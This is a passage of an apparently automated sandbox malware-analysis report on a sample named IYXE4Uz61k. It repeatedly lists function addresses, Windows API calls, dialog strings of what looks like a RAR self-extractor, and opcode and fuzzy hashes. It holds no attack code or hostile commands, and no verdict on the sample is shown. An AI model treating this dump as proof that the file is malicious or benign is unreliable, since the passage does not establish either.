                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                                                                                                    • Opcode ID: 51ce942bca1d937423d1fb46bf93965655082d089bba0f053e9d23453f992df8
                                                                                                                                                                                                    • Instruction ID: 026e1898cfc47b0f4dfa0828b38b02f1ef3077b67d10dc60343eb0cf8d22f6f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51ce942bca1d937423d1fb46bf93965655082d089bba0f053e9d23453f992df8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40414772900209AFCF15EFD8CD81AEEBBB5FF48305F188059F909A7221D335AA50DB51
                                                                                                                                                                                                    Function 00877401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00877406
                                                                                                                                                                                                      • Part of subcall function 00873BBA: __EH_prolog.LIBCMT ref: 00873BBF
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 008774CD
                                                                                                                                                                                                      • Part of subcall function 00877A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAB
                                                                                                                                                                                                      • Part of subcall function 00877A9C: GetLastError.KERNEL32 ref: 00877AF1
                                                                                                                                                                                                      • Part of subcall function 00877A9C: CloseHandle.KERNEL32(?), ref: 00877B00
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                                                                                                    • Opcode ID: 34137c63d4a282a1de61ccd66acc98061b80d396a0d2a90f6709cd6d0d2971c4
                                                                                                                                                                                                    • Instruction ID: 68d6ae9984fbea2a8787df428fdf95fd7142ab4e120aab1b6214a40b3bd10315
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34137c63d4a282a1de61ccd66acc98061b80d396a0d2a90f6709cd6d0d2971c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00318171D04258AAEF11EBA8DC45BEEBBA9FF15314F048015F409E7296DB74CA44CB62
                                                                                                                                                                                                    Function 0088AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088AD98
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0088ADAD
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0088ADC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                                                                                                    • Opcode ID: dccd30cab27a425fb3b9b89f79cdf308624894a14dadf160b47551c729ce868e
                                                                                                                                                                                                    • Instruction ID: 927f45074ee2c0fef1274d7b59db556a452c7e5c0d798b05460e80e6e8a6a51d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dccd30cab27a425fb3b9b89f79cdf308624894a14dadf160b47551c729ce868e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4118132341600BFEA25AF689D49F6A77A9FF5A742F004112F241EB5E4C762AE059723
                                                                                                                                                                                                    Function 0087D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fprintf_l.LIBCMT ref: 0087D954
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 0087D99A
                                                                                                                                                                                                      • Part of subcall function 00881DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,008B1030,?,0087D928,00000000,?,00000050,008B1030), ref: 00881DC4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                                                    • String ID: $%s$@%s
                                                                                                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                                                                                                    • Opcode ID: 6a0932d98c15a4f91e09b3bbcfdf8891caec96fd2eb51f66bc680c37a952243e
                                                                                                                                                                                                    • Instruction ID: f2dd9320da8160964bbcaee4b1859e9aa32228b3c116b2470824b31492a62f41
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a0932d98c15a4f91e09b3bbcfdf8891caec96fd2eb51f66bc680c37a952243e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9219F3240034CAAEB20EEA4CC01FDE7BF8FF05304F048011FA14D6196E232D648DB51
                                                                                                                                                                                                    Function 00880E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0087AC5A,00000008,?,00000000,?,0087D22D,?,00000000), ref: 00880E85
                                                                                                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0087AC5A,00000008,?,00000000,?,0087D22D,?,00000000), ref: 00880E8F
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0087AC5A,00000008,?,00000000,?,0087D22D,?,00000000), ref: 00880E9F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Thread pool initialization failed., xrefs: 00880EB7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                                                                                                    • Opcode ID: e055b4f01db16f9238e608317538c855f46394a94ca5c4fcd2ae884c0cb29bac
                                                                                                                                                                                                    • Instruction ID: 5b5a8d3502a874ec6e0ef6c87753acc9326b7471b46a37573b7fae9e814f2552
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e055b4f01db16f9238e608317538c855f46394a94ca5c4fcd2ae884c0cb29bac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C41191B1600B089FD3316F6A9C849A7FBECFB95744F10482EF1DAC2201D6B1A9448B50
                                                                                                                                                                                                    Function 0088B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088B2BE
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0088B2D6
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0088B304
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                                                                    • String ID: GETPASSWORD1
                                                                                                                                                                                                    • API String ID: 445417207-3292211884
                                                                                                                                                                                                    • Opcode ID: 2762fdb4fa3be664b00b5afa46368c419d95c6e11244f631525fd03880b07d3b
                                                                                                                                                                                                    • Instruction ID: 92a09b029ce1d825fa53ec3203d985ad1092fd98b698cb96d100a3884015bf29
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2762fdb4fa3be664b00b5afa46368c419d95c6e11244f631525fd03880b07d3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711C432900119B6DB21ABA89C49FFF376CFF99700F004021FA45F3284C7A5DE459762
                                                                                                                                                                                                    Function 0088DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                    • API String ID: 0-56093855
                                                                                                                                                                                                    • Opcode ID: 34d9927a551a1488c76e81cff08078581507629bd71f91913fc6161d73559fc4
                                                                                                                                                                                                    • Instruction ID: 1aff7298ed0bdc0b1e0ee173b3d9d8b49d5632fce128b87de4f1da31432fdb88
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34d9927a551a1488c76e81cff08078581507629bd71f91913fc6161d73559fc4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8201DF36604349EFDB20AFA4FC44E9A7BA8F709354B000526F905C32B1C730AC90DBE0
                                                                                                                                                                                                    Function 00899A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                                                                                                                    • Instruction ID: 62310b910e3795f453732706add14e394ca2cfae8b4d348536a7b4117c0ac8c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75A13372A0029A9FEF21AE2CCC917AEBBE5FF65314F1C41ADE4C5DB281D2389941C751
                                                                                                                                                                                                    Function 0087A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00877F69,?,?,?), ref: 0087A3FA
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00877F69,?), ref: 0087A43E
                                                                                                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00877F69,?,?,?,?,?,?,?), ref: 0087A4BF
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00877F69,?,?,?,?,?,?,?,?,?,?), ref: 0087A4C6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2287278272-0
                                                                                                                                                                                                    • Opcode ID: ff0cf2e0030cbb01d0c6c63673d7d36e4488c5b11f188992b2986b654756fb76
                                                                                                                                                                                                    • Instruction ID: be6c0aa69ff3e926ca5694fce1493a9a7bb2b901cef1f16e815ce01e7658b716
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff0cf2e0030cbb01d0c6c63673d7d36e4488c5b11f188992b2986b654756fb76
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA41CF312483819AE735DF24DC49FAEBBE8FBC1304F048919B5D8D3294D6A5DA489B53
                                                                                                                                                                                                    Function 00871100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                    • Opcode ID: 2d3f92ce1173060123439fb4816f2075998be7724b599fdb43b99b9e40a931fc
                                                                                                                                                                                                    • Instruction ID: 9dd4210cb7c95e9465419c3cb0f13c0dd889a3c64652d97da771d4902302b05f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d3f92ce1173060123439fb4816f2075998be7724b599fdb43b99b9e40a931fc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16418371A006695BCB51EF6C8C499DE7BB8FF01310F14412AFD49F7245DA30EE498BA5
                                                                                                                                                                                                    Function 0089C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,008947C6,00000000,00000000,008957FB,?,008957FB,?,00000001,008947C6,2DE85006,00000001,008957FB,008957FB), ref: 0089C9D5
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0089CA5E
                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0089CA70
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0089CA79
                                                                                                                                                                                                      • Part of subcall function 00898E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                                    • Opcode ID: 3a47ff18b425db3aec811f5a6a0e3dd0c65c4258df7da1c243439c57b91872e4
                                                                                                                                                                                                    • Instruction ID: 8f59a085eaf18df4faa2a6d307506f7a622b18264fb81eac1b487d377d86505f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a47ff18b425db3aec811f5a6a0e3dd0c65c4258df7da1c243439c57b91872e4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59318EB2A0021AAFDF25EF68DC55DAE7BA5FB41310B184168FC05E6251EB36DD50CB90
                                                                                                                                                                                                    Function 0088A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0088A666
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0088A675
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0088A683
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0088A691
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                    • Opcode ID: 8ed4e452d337d547f43a80e6c56f2d39acb8de68f206e69e52d55524cdcd32e0
                                                                                                                                                                                                    • Instruction ID: 95c89a478d0c9c3ca0462476e7b60ec268fc07f9dc22c50a03d0ef8f5115047b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ed4e452d337d547f43a80e6c56f2d39acb8de68f206e69e52d55524cdcd32e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83E0EC31983B21E7D3615B60AC0DB8A3F58BB15B52F050322FA05A61D0DB648A008BE6
                                                                                                                                                                                                    Function 0088A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0088A699: GetDC.USER32(00000000), ref: 0088A69D
                                                                                                                                                                                                      • Part of subcall function 0088A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0088A6A8
                                                                                                                                                                                                      • Part of subcall function 0088A699: ReleaseDC.USER32(00000000,00000000), ref: 0088A6B3
                                                                                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0088A83C
                                                                                                                                                                                                      • Part of subcall function 0088AAC9: GetDC.USER32(00000000), ref: 0088AAD2
                                                                                                                                                                                                      • Part of subcall function 0088AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0088AB01
                                                                                                                                                                                                      • Part of subcall function 0088AAC9: ReleaseDC.USER32(00000000,?), ref: 0088AB99
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
